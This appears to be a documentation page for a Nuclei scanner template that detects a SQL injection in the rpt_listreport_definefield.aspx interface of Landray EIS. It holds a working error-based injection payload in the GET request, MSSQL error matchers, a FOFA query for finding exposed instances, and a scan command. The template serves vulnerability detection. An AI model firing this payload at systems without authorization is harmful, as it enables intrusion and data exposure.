Skip to content
Nuclei Templates

Landray EIS - SQL Injection

ID: landray-eis-sqli

Severity: high

Author: DhiyaneshDK

Tags: landray,eims,sqli

Description

Section titled “Description”

Landray’s smart collaboration platform EIS has a very rich collection of modules to meet the needs of organizations and enterprises in knowledge, collaboration, and project management system construction. There is a SQL injection vulnerability in the rpt_listreport_definefield.aspx interface of Landray EIS smart collaboration platform

YAML Source

Section titled “YAML Source”
id: landray-eis-sqli


info:
  name: Landray EIS - SQL Injection
  author: DhiyaneshDK
  severity: high
  description: |
    Landray's smart collaboration platform EIS has a very rich collection of modules to meet the needs of organizations and enterprises in knowledge, collaboration, and project management system construction. There is a SQL injection vulnerability in the rpt_listreport_definefield.aspx interface of Landray EIS smart collaboration platform
  reference:
    - https://github.com/wy876/POC/blob/main/%E8%93%9D%E5%87%8CEIS%E6%99%BA%E6%85%A7%E5%8D%8F%E5%90%8C%E5%B9%B3%E5%8F%B0rpt_listreport_definefield.aspx%E6%8E%A5%E5%8F%A3%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md?plain=1
  classification:
    cpe: cpe:2.3:a:landray:landray_office_automation:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: landray
    product: landray_office_automation
    fofa-query: app="Landray-OA系统"
  tags: landray,eims,sqli


http:
  - method: GET
    path:
      - "{{BaseURL}}/SM/rpt_listreport_definefield.aspx?ID=2%20and%201=@@version--+"


    matchers:
      - type: word
        words:
          - "Microsoft SQL Server"
          - "SqlException"
        condition: and
# digest: 4a0a004730450220764de5530d2d160bae59b679902e5c9c6f3fddb11fd1307bd96f8ab6bdcf63530221009a8ade9e7096b30f0eae3b19a4d2edc9df5861b31b7a84f3c4a02bb4cb96cccb:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/landray/landray-eis-sqli.yaml"

View on Github